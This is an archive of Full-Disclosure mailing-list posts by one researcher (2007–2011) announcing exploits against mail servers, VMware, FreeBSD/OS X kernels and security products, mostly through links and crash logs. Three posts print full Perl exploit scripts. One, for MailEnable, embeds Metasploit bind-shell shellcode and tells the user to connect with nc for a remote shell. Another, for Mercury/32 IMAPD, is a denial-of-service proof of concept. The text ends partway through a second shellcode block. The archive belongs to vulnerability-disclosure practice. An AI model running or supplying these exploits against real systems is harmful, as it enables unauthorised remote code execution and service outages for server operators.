from:"mu\-b"

[Full-disclosure] Trusteer Rapport and anti-keylogging

2011-09-21 Thread mu-b

All - It has been a few weeks now since I demonstrated the following at
44con (http://www.44con.com) and thus time to just dump the details here.

The following are what can only be described as 'design flaws' in
Trusteer Rapport's anti-keylogger protections, that is Rapport provides
the functionality to decrypt keys to *everyone* along with the ability
to 'switch-off' anti-keylogger protections all together. However, I
should say that in the latter case, Trusteer aren't the only ones to
provide such functionality, KeyScrambler does also.

This is somewhat documented in the following post,
http://www.digit-security.com/blog/?p=47

The following are for OSX *only*, but you can extend these to Windows
trivially (the ioctl obfuscation layer is easily bypassed by using
Trusteer's own code),

http://.digit-security.com/files/exploits/rapport-switchoff.c
- switches off anti-keylogger protections on OSX allowing your already
existing keylogger to function correctly once again.

http://.digit-security.com/files/exploits/rapport-listen.c
- uses Trusteer's own functionality to 'decrypt' keys directly.

-- 
mu-b
(m...@digit-labs.org)

  Only a few people will follow the proof. Whoever does will
 spend the rest of his life convincing people it is correct.
- Anonymous, P ?= NP

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] NovaStor NovaNet = 13.0 issues

2010-04-26 Thread mu-b

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

All - many of the following were inexplicably fixed in the latest
version (NovaBACKUP Network 13.0), but still, a 2.5 year run isn't too
bad...

http://digit-labs.org/files/exploits/novanet-own-lnx.c
- - linux remote root = 12.0

http://digit-labs.org/files/exploits/novanet-read.c
- - arbitrary remote dword read = 12.0

http://digit-labs.org/files/exploits/novanet-own.c
- - Windows (no-DEP/NX, NovaNet 11.0) remote SYSTEM = 12.0
  (messy, there is a cleaner version)

They seemed to have missed the last one, so it still works on 13.0, but
sadly the most useless  :(

http://digit-labs.org/files/exploits/novanet-dos.c
- - null deref remote DoS = 13.0

- --
mu-b
(m...@digit-labs.org)

  Only a few people will follow the proof. Whoever does will
 spend the rest of his life convincing people it is correct.
- Anonymous, P ?= NP
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (Darwin)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAkvVhHoACgkQY0H9BP42EjyqLwCfR941RwSLqTuh3xE2jDx4fBm6
REUAn36dzHIwJzq+dmlkZNSACKlz7eOW
=aSH0
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] un-SafeCentral

2010-01-15 Thread mu-b

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

All - well, it would seem that SafeCentral (www.safecentral.com) really
isn't all that safe! of course it is 'safe', that is secure, under the
assumption that Authentium seem to behold that all malware coders are
obviously idiots.

Those that aren't idiots would not really find it all that hard to break..

http://www.digit-labs.org/files/otherstuff/unsafecentral/
- --
mu-b
(m...@digit-labs.org)

  Only a few people will follow the proof. Whoever does will
 spend the rest of his life convincing people it is correct.
- Anonymous, P ?= NP
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (Darwin)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAktQsnYACgkQY0H9BP42Ejz5XgCgnBpM+LWtcVuIvg/nVRxZgMog
f8EAnjVhReR3Xsik5yoQnwSLZuJZFazo
=hVnZ
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] VMSA-2009-0013 VMware Fusion resolves two security issues

2009-10-02 Thread mu-b

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

All - the first bug is self-explanatory,

 # Kernel denial of service vulnerability
 An integer overflow vulnerability in the vmx86 kernel extension allows
 for a denial of service by an unprivileged user.

The vmx86 kext ioctl handler contains several integer overflows which
lead to kernel heap corruptions. These are probably not exploitable, and
I didn't try given the second bug,

http://www.digit-labs.org/files/exploits/vmware-pop.c

 # Kernel code execution vulnerability
 An ioctl vulnerability in the vmx86 kernel extension allows for
 executing arbitrary code in the kernel context by an unprivileged
 user.

The vmx86 kext ioctl handler permits an unprivileged userland program to
initialize several function pointers via the 0x802E564A ioctl code.
These function pointers are later used from several reachable locations
within the driver, one of which is called immediately after initialization.

http://www.digit-labs.org/files/exploits/vmware-fission.c

- --
mu-b
(m...@digit-labs.org)

  Only a few people will follow the proof. Whoever does will
 spend the rest of his life convincing people it is correct.
- Anonymous, P ?= NP
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (Darwin)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAkrFvGUACgkQY0H9BP42EjxSCACdEzIXe0D8n+VVplyEsuCbPBKS
TjAAnAnHUPOSKrphGeaynF5bIKYQNyPY
=lMJv
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] FreeBSD/OS X kernel bug dump

2009-03-24 Thread mu-b

thanks to the person who bothered to let me know the links were *slighty*
wrong, that is what you get trying to stay awake to beat jet-lag...

Quoting m...@digit-labs.org:

 All - the following are the exploits from the recent demonstrations at

 Apple Mac OSX = 10.4.0 local kernel root


http://www.digit-labs.org/files/exploits/xnu-hfs-fcntl-v2.c
http://www.digit-labs.org/files/exploits/xnu-hfs-fcntl-v2.sh


 FreeBSD = 7.0 ktimer local kernel root
 (http://security.freebsd.org/advisories/FreeBSD-SA-09:06.ktimer.asc)

 http://www.digit-labs.org/files/exploits/bsd-ktimer.c

 other random stuff..

 http://www.digit-labs.org/files/exploits/xnu-macfsstat-leak.c
 http://www.digit-labs.org/files/exploits/xnu-profil-leak.c
 http://www.digit-labs.org/files/exploits/xnu-appletalk-zip.c

 all the above are old now, but still exist today...

 christer/mu-b
 --
 mu-b
 (m...@digit-labs.org)

Only a few people will follow the proof. Whoever does will
   spend the rest of his life convincing people it is correct.
  - Anonymous, P ?= NP

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] FreeBSD/OS X kernel bug dump

2009-03-23 Thread mu-b

All - the following are the exploits from the recent demonstrations at

Apple Mac OSX = 10.4.0 local kernel root

http://www.digit-labs.org/files/exploits/xnu-hfs-fcntl.c
http://www.digit-labs.org/files/exploits/xnu-hfs-fcntl.sh

FreeBSD = 7.0 ktimer local kernel root
(http://security.freebsd.org/advisories/FreeBSD-SA-09:06.ktimer.asc)

http://www.digit-labs.org/files/exploits/bsd-ktimer.c

other random stuff..

http://www.digit-labs.org/files/exploits/xnu-macfsstat-leak.c
http://www.digit-labs.org/files/exploits/xnu-profil-leak.c
http://www.digit-labs.org/files/exploits/xnu-appletalk-zip.c

all the above are old now, but still exist today...

christer/mu-b
--
mu-b
(m...@digit-labs.org)

   Only a few people will follow the proof. Whoever does will
  spend the rest of his life convincing people it is correct.
 - Anonymous, P ?= NP

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] eXtremail(ly easy) remote roots

2007-10-15 Thread mu-b

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

The attached either exploit or demonstrate a rash of remotely
exploitable bugs in eXtremail =2.1.1 which perhaps should be
renamed to the more apt name of eXtremely-rootable-mail...

of course, in the grand schema, these are more-or-less completely
useless!..

*) extremail-v3.pl demonstrates two vulnerabilities, the first
a denial of service caused by an integer underflow into the
length argument of a call to memmove(). This is caused due to
the author replacing every occurrence of %s with %%s (before
logging the resulting string to a file, perhaps the author is
still somewhat paranoid after the re-occurrence of older format
string vulnerabilities :-)) whilst forgetting to take
into account that the string actually gets longer by a single-byte
after each replace!. The second bug is rather interesting and is
either a failure in GCC points-to analysis or a consequence of
the author neglecting the possibility that a temporary pointer
to a heap buffer may have changed after a call to realloc
(ifReservaMasMem) and refreshing the pointer to the heap
buffer given as argument (which may have been free()'d).
(I would tend to believe the later..)
This results in the overwriting of potentially free'd memory
with user-definable data (albeit very restricted).
PoC: http://www.digit-labs.org/files/exploits/extremail-v3.pl

*) extremail-v4.c - trivial remote stack-overflow in the admin
interface.
PoC: http://www.digit-labs.org/files/exploits/extremail-v4.c

*) extremail-v5.c - remote heap overflow in CRAM-MD5 authentication.
PoC: http://www.digit-labs.org/files/exploits/extremail-v5.c

*) extremail-v6.c - trivial remote stack-overflow in PLAIN
authentication.
PoC: http://www.digit-labs.org/files/exploits/extremail-v6.c

*) extremail-v7.c - THIS PAGE UNINTENTIONALLY LEFT BLANK
(I appear to have misplaced it, but given that eXtremail is
holier than the pope himself, I shouldn't think it would take
too long to fill.)

*) extremail-v8.pl demonstrates a remote heap overflow in the
recv()-loop whereby the author has mistakenly assumed that the
string length of all currently received data is at least equal to
the sum of all return values from each call to recv().
(trivial contradiction follows if we send() the first buffer
containing \x00). This causes an incorrect number of bytes to
be reallocated and a remote heap overflow in a call to memcpy().
PoC: http://www.digit-labs.org/files/exploits/extremail-v8.pl
- --
mu-b
([EMAIL PROTECTED])

  Only a few people will follow the proof. Whoever does will
 spend the rest of his life convincing people it is correct.
- Anonymous, P ?= NP
-BEGIN PGP SIGNATURE-
Version: GnuPG v2.0.3 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHE0/EY0H9BP42EjwRCOMpAKDMa0qnZ3ZzDntbmwo505GjLUzcSACeIG00
3lsWit0K9ZIApcLXUg+CrgM=
=LkOe
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] SafeNET High Assurance Remote/SoftRemote (IPSecDrv.sys) remote DoS

2007-06-08 Thread mu-b

Attached is POC for a remote DoS in IPSecDrv.sys shipped with
SafeNET High Assurance Remote and SoftRemote. The version
tested is 10.4.0.12.

The bug itself is due to SafeNET making a complete hash of IPv6
support for IPSec. The result of the code is a complete DoS of
the machine in Kernel mode whilst the driver proceeds to enter
an infinite loop (apparently looking for a suitable IPSec extension
header, which it will never find). The dodgy code can be found
at offset 0x1000BEB0 of IPSecDrv.sys (10.4.0.12).

The attached code will only work over local subnets, however
this is trivially remote with IPv6.

PoC: http://www.digit-labs.org/files/exploits/safenet-dos.c

hmmm, I wonder how SafeNET think they can charge for such a
half-baked, crufty, god-awful implementation
--
mu-b
([EMAIL PROTECTED])

  Only a few people will follow the proof. Whoever does will
 spend the rest of his life convincing people it is correct.
- Anonymous, P ?= NP

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] mydns-1.1.0 remote heap overflow

2007-04-27 Thread mu-b

The attached PoC causes a remote heap smash in mydns 1.1.0, the bug is found
within the dynamic update code (update.c). Exploitation requires update privs
(which tends not to matter too much if you know an IP address with
privileges to do so), also allow-update = yes must be set in /etc/mydns.conf.
The attached patch also fixes a stack based off-by-one overflow in update.c.

Example :-
0xb7f27410 in __kernel_vsyscall
()
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x0805d0e2 in ?? ()
(gdb) x/i $eip
0x805d0e2 [EMAIL PROTECTED]:   rep movsb %ds:(%esi),%es:(%edi)

PoC: http://www.digit-labs.org/files/exploits/mydns-rr-smash.c
Patch: http://www.digit-labs.org/files/patches/mydns-update.c.diff
-- 
mu-b
([EMAIL PROTECTED])

  Only a few people will follow the proof. Whoever does will
 spend the rest of his life convincing people it is correct.
- Anonymous, P ?= NP

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] eXtremail-v9

2007-04-20 Thread mu-b

The attached POC exploits a trivial stack smash in the DNS parsing code
of eXtremail versions = 2.1.1 (current). The POC attached is rather
trivial in that it simply answers queries with a suitable response
(to exhibit the overflow).

However, the problem is further compounded by the fact that eXtremail
neglects to even verify the validity of the transaction id in any
responses, and thus is trivially vulnerable to DNS spoofing attacks
(I am *pretty* sure a more *inventive* method of exploitation exists
to yield trivial remote root...).

Program received signal SIGSEGV, Segmentation fault.
0xdeadbeef in ?? ()
(gdb) bt
#0  0xdeadbeef in ?? ()
#1  0x3031002e in ?? ()
#2  0x3634 in ?? ()
#3  0x in ?? ()
(gdb)

POC: http://www.digit-labs.org/files/exploits/extremail-v9.c
-- 
mu-b
([EMAIL PROTECTED])

  Only a few people will follow the proof. Whoever does will
 spend the rest of his life convincing people it is correct.
- Anonymous, P ?= NP

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] dproxy - arbitrary code execution through stack buffer overflow vulnerability

2007-03-23 Thread mu-b

you might want to NULL terminate query_string while your there

Alexander Klink wrote:
 
 ||| Security Advisory AKLINK-SA-2007-001 |||
 ||| CVE-2007-1465 (CVE candidate)|||
 

 dproxy - remotely exploitable buffer overflow
 

 Date released: 20.03.2007
 Date reported: 11.03.2007
 $Revision: 1.1 $

 by Alexander Klink
Cynops GmbH
[EMAIL PROTECTED]
https://www.cynops.de/advisories/CVE-2007-1465.txt
(S/MIME signed: https://www.cynops.de/advisories/CVE-2007-1465-signed.txt)

 https://www.klink.name/security/aklink-sa-2007-001-dproxy-bufferoverflow.txt
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1465

 Vendor: Matthew Pratt (Open Source)
 Product: dproxy - a small caching DNS server
 Website: http://dproxy.sourceforge.net
 Vulnerability: buffer overflow
 Class: remote
 Status: unpatched (author is unresponsive)
 Severity: high (arbitrary command execution as root)
 Releases known to be affected: 0.1, 0.2, 0.3, 0.4, 0.5
 Releases known NOT to be affected: dproxy-nexgen

 +
 Overview:

 dproxy suffers from a typical buffer overflow condition, which allows
 an attacker to overwrite the stack.

 +
 Technical details:

 In dproxy.c, the UDP packet buffer, which can be up to 4096 bytes long
 is copied into a variable called query_string, which is at most 2048
 bytes. As this is done using strcpy, the stack can be overwritten
 which leads to arbitrary command execution.

 Note that one can easily find out whether dproxy is running
 using the fpdns tool (see http://www.rfc.se/fpdns/). dproxy also
 seems to be used in a number of WLAN access points / routers, but
 the version used there (at least in the Linksys WRT54AG, the Asus
 WL500g and the Netgear DG834G) seems to be dproxy-nexgen, which is not
 vulnerable to this attack.

 Thanks to Dan Kaminsky, who provided me with the interesting statistics
 that apparently only 20 out of about 2.000.000 DNS servers he scanned
 are using dproxy. So this does not look like a major attack vector.

 +
 Exploit:

 A MetaSploit Framework 2.7 exploit module is available from
 https://www.cynops.de/downloads/metasploit/dproxy.pm

 It has been tested successfully with both a Debian stable and an
 Ubuntu system (with randomize_va_space=0).

 +
 Workaround:

 Drop packets to the destination UDP port 53 which are larger than
 2048 bytes (which is a pretty large DNS query packet anyway).

 +
 Communication:

 * 13.03.2007: Author updated on vulnerable versions
 * 11.03.2007: First problem report to author

 +
 Solution:

 Patch dproxy.c:

 --- dproxy-0.5/dproxy.c 2000-02-03 04:15:35.0 +0100
 +++ dproxy-0.5.patched/dproxy.c 2007-03-13 13:07:53.0 +0100
 @@ -105,7 +105,7 @@
/* child process only here */
signal(SIGCHLD, SIG_IGN);

 -  strcpy( query_string, pkt.buf );
 +  strncpy( query_string, pkt.buf, sizeof(query_string) );
decode_domain_name( query_string );
debug(query: %s\n, query_string );

 +
 Credits:

 Alexander Klink, Cynops GmbH (discovery and exploit development, patch)

-- 
mu-b
([EMAIL PROTECTED])

  Only a few people will follow the proof. Whoever does will
 spend the rest of his life convincing people it is correct.
- Anonymous, P ?= NP

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Mercur SP4 IMAPD

2007-03-20 Thread mu-b

The attached exploits several signedness bugs in the NTLM implementation
of Mercur IMAPD (www.atrium-software.com) to give the attacker
complete control over a memcpy to a stack variable... (non-authenticated)
In this case, memcpy(buf, src+a, b) with 'a', and 'b' being user controlled
and buf ~7208 bytes.

note due to the most important signedness issue, we can only control 'a' within
the range -65535  a  65536...

The result of the PoC is an simple crash trying to copy 0x bytes...

(d94.1dc): Access violation - code c005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0210a108 ebx=0210ac24 ecx=3fffeb08 edx= esi=0211 edi=0210f4e4
eip=0042e0d3 esp=021098c8 ebp=021098d0 iopl=0 nv up ei pl nz na pe cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs= efl=00010207
*** WARNING: Unable to verify checksum for C:\Program Files\MERCUR\mcrimap4.exe
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for 
C:\Program Files\MERCUR\mcrimap4.exe -
mcrimap4!_GetExceptDLLinfo+0x2d05f:
0042e0d3 f3a5rep movs dword ptr es:[edi],dword ptr [esi] 
es:0023:0210f4e4= ds:0023:0211=???

PoC: http://www.digit-labs.org/files/exploits/mercur-v1.pl
-- 
mu-b
([EMAIL PROTECTED])

  Only a few people will follow the proof. Whoever does will
 spend the rest of his life convincing people it is correct.
- Anonymous, P ?= NP

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Mercury/32 4.01b

2007-03-06 Thread mu-b

Attached is a remote exploit (disarmed PoC) for Mercury/32 4.01b IMAPD.
The vulnerability is located in the call:-
034646AE callsub_346ECD9
which is passes (as third argument) the number of bytes remaining in a
stack buffer in order to construct the complete command from the
continuation data. However the calculation neglects to take into account
the length of the previously supplied command (1 LOGIN 900 x '\x20' {255}).

The result of the attached exploit is a DoS (given below), however, remote code
execution is possible in at least two different ways without authentication...

(b24.a70): Access violation - code c005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0456d70c ebx=41414141 ecx=7ffad000 edx=034a2970 esi=0500 edi=
eip=00441d88 esp=0456d6dc ebp=0456d6ec iopl=0 nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs= efl=00010246
mercuryi!miconfig_proc_3+0xbacd:
0346ed48 8807mov byte ptr [edi],al  ds:0023:0457=??

(note this may be the same as BID 21110).
-- 
mu-b
([EMAIL PROTECTED])

  Only a few people will follow the proof. Whoever does will
 spend the rest of his life convincing people it is correct.
- Anonymous, P ?= NP
#!/usr/bin/perl
#
# mercurypown-v1.pl
#
# Mercury/32 v4.01b (win32) remote exploit
# by mu-b - 28 Nov 2006
#
# - Tested on: Mercury/32 v4.01a (win32)
#  Mercury/32 v4.01b (win32)
#
# Stack-based buffer overflow caused by Mercury/32 concatenating
# continuation data into a fixed sized buffer disregarding
# the length of the original command, you do not require authentication.
#
# This is a little harder to exploit than usual since the
# stack frame in question calls end_thread before returning..
# buts it's still possible by at *least* two different ways...
# (i.e. controlling a pointer into sprintf and/or controlling
#  a pointer to be free()).
#


use Getopt::Std; getopts('t:n:', \%arg);
use Socket;

print_header;

my $target;

if (defined($arg{'t'})) { $target = $arg{'t'} }
if (!(defined($target))) { usage; }

my $imapd_port = 143;
my $send_delay = 1;

my $NOP = 'A';
my $LEN = 9200;#8928;
my $BUFLEN = 8192;

if (connect_host($target, $imapd_port)) {
print(- * Connected\n);
$buf = 1 LOGIN.( x($LEN-$BUFLEN)).\{255\}\n;
send(SOCKET, $buf, 0);
sleep($send_delay);

print(- * Sending payload\n);
$buf = $NOP x 255;
send(SOCKET, $buf, 0);
sleep($send_delay);

print(- * Sending payload 2\n);
$buf = $NOP x $BUFLEN;
send(SOCKET, $buf, 0);
sleep($send_delay);

print(- * Successfully sent payload!\n);
}

sub print_header {
print(Mercury/32 v4.01b (win32) remote exploit\n);
print(by: [EMAIL PROTECTED]\n\n);
}

sub usage {
print(qq(Usage: $0 -t hostname

 -t hostname: hostname to test
));

exit(1);
}

sub connect_host {
($target, $port) = @_;
$iaddr  = inet_aton($target) || die(Error: $!\n);
$paddr  = sockaddr_in($port, $iaddr) || die(Error: $!\n);
$proto  = getprotobyname('tcp')  || die(Error: $!\n);

socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die(Error: $!\n);
connect(SOCKET, $paddr)  || die(Error: $!\n);
return(1337);
}
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] MailEnable v2.37 APPEND exploit

2007-03-02 Thread mu-b

Attached is another exploit for the MailEnable Pro/Ent = 2.37 (including the
latest). The vulnerability is a bog-standard stack based overflow in the
call at offset 0x00417CD6 (MEIMAPS.exe, v2.37).

---
([EMAIL PROTECTED])


#!/usr/bin/perl
#
# maildisable-v4.pl
#
# Mail Enable Professional/Enterprise v2.32-4 (win32) remote exploit
# by mu-b - Wed Nov 29 2006
#
# - Tested on: Mail Enable Professional v2.32 (win32) - with HOTFIX
#  Mail Enable Professional v2.33 (win32)
#  Mail Enable Professional v2.35 (win32)
#  Mail Enable Professional v2.37 (win32)
#


use Getopt::Std; getopts('t:n:u:p:', \%arg);
use Socket;

# Fixed metasploit win32 bindshell port 1337
my $zshell_win32_bind =
  \x33\xc9\x83\xe9\xb0.
  \x81\xc4\xd0\xfd\xff\xff. # add %esp, -560
  \xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1d.
  \xcc\x32\x69\x83\xeb\xfc\xe2\xf4\xe1\xa6\xd9\x24\xf5\x35\xcd\x96.
  \xe2\xac\xb9\x05\x39\xe8\xb9\x2c\x21\x47\x4e\x6c\x65\xcd\xdd\xe2.
  \x52\xd4\xb9\x36\x3d\xcd\xd9\x20\x96\xf8\xb9\x68\xf3\xfd\xf2\xf0.
  \xb1\x48\xf2\x1d\x1a\x0d\xf8\x64\x1c\x0e\xd9\x9d\x26\x98\x16\x41.
  \x68\x29\xb9\x36\x39\xcd\xd9\x0f\x96\xc0\x79\xe2\x42\xd0\x33\x82.
  \x1e\xe0\xb9\xe0\x71\xe8\x2e\x08\xde\xfd\xe9\x0d\x96\x8f\x02\xe2.
  \x5d\xc0\xb9\x19\x01\x61\xb9\x29\x15\x92\x5a\xe7\x53\xc2\xde\x39.
  \xe2\x1a\x54\x3a\x7b\xa4\x01\x5b\x75\xbb\x41\x5b\x42\x98\xcd\xb9.
  \x75\x07\xdf\x95\x26\x9c\xcd\xbf\x42\x45\xd7\x0f\x9c\x21\x3a\x6b.
  \x48\xa6\x30\x96\xcd\xa4\xeb\x60\xe8\x61\x65\x96\xcb\x9f\x61\x3a.
  \x4e\x9f\x71\x3a\x5e\x9f\xcd\xb9\x7b\xa4\x37\x50\x7b\x9f\xbb\x88.
  \x88\xa4\x96\x73\x6d\x0b\x65\x96\xcb\xa6\x22\x38\x48\x33\xe2\x01.
  \xb9\x61\x1c\x80\x4a\x33\xe4\x3a\x48\x33\xe2\x01\xf8\x85\xb4\x20.
  \x4a\x33\xe4\x39\x49\x98\x67\x96\xcd\x5f\x5a\x8e\x64\x0a\x4b\x3e.
  \xe2\x1a\x67\x96\xcd\xaa\x58\x0d\x7b\xa4\x51\x04\x94\x29\x58\x39.
  \x44\xe5\xfe\xe0\xfa\xa6\x76\xe0\xff\xfd\xf2\x9a\xb7\x32\x70\x44.
  \xe3\x8e\x1e\xfa\x90\xb6\x0a\xc2\xb6\x67\x5a\x1b\xe3\x7f\x24\x96.
  \x68\x88\xcd\xbf\x46\x9b\x60\x38\x4c\x9d\x58\x68\x4c\x9d\x67\x38.
  \xe2\x1c\x5a\xc4\xc4\xc9\xfc\x3a\xe2\x1a\x58\x96\xe2\xfb\xcd\xb9.
  \x96\x9b\xce\xea\xd9\xa8\xcd\xbf\x4f\x33\xe2\x01\xf2\x02\xd2\x09.
  \x4e\x33\xe4\x96\xcd\xcc\x32\x69;

# ff e4 - jmp %esp
my @offsets = ( \x63\x37\x57\x7c, # Win2K Server SP4 KERNEL32.dll
\x38\x07\xd2\x77,
\xef\xbe\xad\xde  # DoS
  );

print_header;

my $target;
my $offset;
my $user;
my $passwd;

if (defined($arg{'t'})) { $target = $arg{'t'} }
if (defined($arg{'n'})) { $offset = $arg{'n'} }
if (defined($arg{'u'})) { $user = $arg{'u'} }
if (defined($arg{'p'})) { $passwd = $arg{'p'} }
if (!(defined($target)) || !(defined($user)) || !(defined($passwd))) { usage; }
if (!(defined($offset))) { $offset = 0; }
if ($offset  $#offsets) {
print(only .($#offsets+1). targets known!!\n);
exit(1);
} else {
$offset = $offsets[$offset];
}

my $imapd_port = 143;
my $send_delay = 2;

my $NOP = 'A';

if (connect_host($target, $imapd_port)) {
print(- * Connected\n);
send(SOCKET, 1 LOGIN .$user. .$passwd.\r\n, 0);
sleep($send_delay);

print(- * Sending payload\n);
$buf = 2 APPEND \()\\{.
   ($NOP x 128).
   \xef\xbe\xad\xde.
   $offset.
   \x01\xa3\x19\x03.
   ($NOP x 8 ).
   $zshell_win32_bind.
   \}\r\n;
send(SOCKET, $buf, 0);
sleep($send_delay);

print(- * Successfully sent payload!\n);
print(- * nc .$target. 1337 for shell...\n);
}

sub print_header {
print(MailEnable Pro v2.32-7 remote exploit\n);
print(by: [EMAIL PROTECTED]\n\n);
}

sub usage {
  print(qq(Usage: $0 -t hostname

 -t hostname: hostname to test
 -n num : return addy offset number
 -u username: username for login
 -p password: usernames password
));

exit(1);
}

sub connect_host {
($target, $port) = @_;
$iaddr  = inet_aton($target) || die(Error: $!\n);
$paddr  = sockaddr_in($port, $iaddr) || die(Error: $!\n);
$proto  = getprotobyname('tcp')  || die(Error: $!\n);

socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die(Error: $!\n);
connect(SOCKET, $paddr)  || die(Error: $!\n);
return(1338);
}
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] More MailEnable exploits..

2007-02-16 Thread mu-b

The following should somewhat specify any mention of unspecified in the
following BID's, patched as some idiots cannot resist trying to own
mailenable.com...

BID: 21252 (maildisable-v3.pl)
BID: 21492 (maildisable-v6.pl)

---
([EMAIL PROTECTED])
#!/usr/bin/perl
#
# maildisable-v3.pl
#
# Mail Enable Professional/Enterprise v2.32-4 (win32) remote exploit
# by mu-b - Thu Nov 23 2006
#
# - Tested on: Mail Enable Professional v2.32 (win32) - with HOTFIX
#  Mail Enable Professional v2.33 (win32)
#  Mail Enable Professional v2.34 (win32)
#
# what does this remind you off?
# Note: timing is quite critical with this!!, so change $send_delay
#   if it doesn't work
#


use Getopt::Std; getopts('t:n:', \%arg);
use Socket;

# metasploit win32 bindshell port 1337
my $zshell_win32_bind =
  \x33\xc9\x83\xe9\xb0.
  \x81\xc4\xd0\xfd\xff\xff.
  \xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1d.
  \xcc\x32\x69\x83\xeb\xfc\xe2\xf4\xe1\xa6\xd9\x24\xf5\x35\xcd\x96.
  \xe2\xac\xb9\x05\x39\xe8\xb9\x2c\x21\x47\x4e\x6c\x65\xcd\xdd\xe2.
  \x52\xd4\xb9\x36\x3d\xcd\xd9\x20\x96\xf8\xb9\x68\xf3\xfd\xf2\xf0.
  \xb1\x48\xf2\x1d\x1a\x0d\xf8\x64\x1c\x0e\xd9\x9d\x26\x98\x16\x41.
  \x68\x29\xb9\x36\x39\xcd\xd9\x0f\x96\xc0\x79\xe2\x42\xd0\x33\x82.
  \x1e\xe0\xb9\xe0\x71\xe8\x2e\x08\xde\xfd\xe9\x0d\x96\x8f\x02\xe2.
  \x5d\xc0\xb9\x19\x01\x61\xb9\x29\x15\x92\x5a\xe7\x53\xc2\xde\x39.
  \xe2\x1a\x54\x3a\x7b\xa4\x01\x5b\x75\xbb\x41\x5b\x42\x98\xcd\xb9.
  \x75\x07\xdf\x95\x26\x9c\xcd\xbf\x42\x45\xd7\x0f\x9c\x21\x3a\x6b.
  \x48\xa6\x30\x96\xcd\xa4\xeb\x60\xe8\x61\x65\x96\xcb\x9f\x61\x3a.
  \x4e\x9f\x71\x3a\x5e\x9f\xcd\xb9\x7b\xa4\x37\x50\x7b\x9f\xbb\x88.
  \x88\xa4\x96\x73\x6d\x0b\x65\x96\xcb\xa6\x22\x38\x48\x33\xe2\x01.
  \xb9\x61\x1c\x80\x4a\x33\xe4\x3a\x48\x33\xe2\x01\xf8\x85\xb4\x20.
  \x4a\x33\xe4\x39\x49\x98\x67\x96\xcd\x5f\x5a\x8e\x64\x0a\x4b\x3e.
  \xe2\x1a\x67\x96\xcd\xaa\x58\x0d\x7b\xa4\x51\x04\x94\x29\x58\x39.
  \x44\xe5\xfe\xe0\xfa\xa6\x76\xe0\xff\xfd\xf2\x9a\xb7\x32\x70\x44.
  \xe3\x8e\x1e\xfa\x90\xb6\x0a\xc2\xb6\x67\x5a\x1b\xe3\x7f\x24\x96.
  \x68\x88\xcd\xbf\x46\x9b\x60\x38\x4c\x9d\x58\x68\x4c\x9d\x67\x38.
  \xe2\x1c\x5a\xc4\xc4\xc9\xfc\x3a\xe2\x1a\x58\x96\xe2\xfb\xcd\xb9.
  \x96\x9b\xce\xea\xd9\xa8\xcd\xbf\x4f\x33\xe2\x01\xf2\x02\xd2\x09.
